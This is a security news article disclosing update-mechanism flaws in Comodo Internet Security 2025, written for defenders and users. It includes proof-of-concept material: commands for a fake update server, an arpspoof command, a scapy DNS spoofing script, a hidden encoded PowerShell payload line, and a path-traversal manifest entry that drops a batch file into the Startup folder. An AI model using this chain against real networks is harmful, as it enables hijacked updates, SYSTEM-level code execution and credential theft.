Security researchers have uncovered a series of severe vulnerabilities in Comodo Internet Security 2025, potentially exposing millions of users to system compromise, data theft, and persistent malware.
The flaws—affecting even fully updated installations on Windows 10—allow attackers to hijack the update process, deliver malicious files, and gain SYSTEM-level privileges through sophisticated network attacks.
1. Update Mechanism Compromised:
The root of the attack lies in Comodo’s failure to properly validate SSL certificates during update checks. By default, Comodo Internet Security (CIS) connects to https://download.comodo.com/ for updates.
However, CIS does not verify the authenticity of the server’s SSL certificate, enabling a threat actor on the same network to perform a DNS spoofing attack.
This redirects the victim’s update traffic to a malicious server, from which tampered update packages can be delivered.
Proof-of-Concept: Setting Up a Malicious Update Server
bashopenssl req -x509 -nodes -days 365 -newkey rsa:2048 \
-keyout localhost.key -out localhost.crt \
-subj "/C=VN/ST=Hanoi/L=Hanoi/O=Dev/OU=Dev/CN=localhost"
sudo cp localhost.crt /etc/ssl/certs/
sudo cp localhost.key /etc/ssl/private/
# Apache2 config: enable SSL, set certificate paths
sudo a2enmod ssl
sudo a2ensite default-ssl.conf
sudo systemctl restart apache2
Attackers then use ARP and DNS spoofing tools to redirect the update traffic:
bashsudo arpspoof -i eth0 -t 10.10.14.4 -r 10.10.14.1
Python DNS spoofing script (snippet):
pythonfrom scapy.all import *
def dns_spoof(packet):
if packet.haslayer(DNS) and packet[DNS].qr == 0:
if "download.comodo.com" in str(packet[DNS].qd.qname):
spoofed_response = IP(dst=packet[IP].src, src=packet[IP].dst) / \
UDP(dport=packet[UDP].sport, sport=packet[UDP].dport) / \
DNS(id=packet[DNS].id, qr=1, aa=1, qd=packet[DNS].qd,
an=DNSRR(rrname=packet[DNS].qd.qname, ttl=10, rdata="192.168.58.192"))
send(spoofed_response, verbose=0)
2. Remote Code Execution via Malicious Update Packages
Once the update traffic is redirected, the attacker can serve a manipulated manifest file (cis_update_x64.xml) and malicious binaries.
Comodo fails to verify the integrity and authenticity of these files, allowing arbitrary code execution as SYSTEM.
Attackers can use tools like Metasploit’s web_delivery module to craft payloads:
powershellpowershell.exe -nop -w hidden -e <base64_payload>
The manifest’s <exec> tag can be abused to run custom commands, leading to fileless execution of malware, including post-exploitation tools such as Mimikatz and hashdump, all under SYSTEM privileges.
3. Path Traversal Enables Arbitrary File Writing
A critical path traversal vulnerability in the update manifest allows attackers to write files anywhere on the victim’s system, including the Windows Startup folder.
By manipulating the name or folder attributes in the manifest, a malicious batch file can be dropped to ensure persistence after reboot:
xml<file name="../../../../../Microsoft/Windows/Start Menu/Programs/Startup/evil.bat" size="1322" sha="..." src="evil.bat">
<put requireReboot="true" />
</file>
Upon reboot, the malicious payload executes, granting the attacker persistent control.
Even though Comodo attempts to isolate such processes, privilege escalation and credential theft remain possible.
Users are urged to immediately enable anti-ARP spoofing, restrict update sources to official servers, and monitor network traffic for anomalies.
Comodo has been notified, but patches are pending.
Until then, these vulnerabilities pose a significant risk to all users of Comodo Internet Security 2025.
Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant updates
%20(1).webp?w=1200&resize=1200,0&ssl=1&description=The flaws—affecting even fully updated installations on Windows 10—allow attackers to hijack the update process, deliver malicious files){kind=link}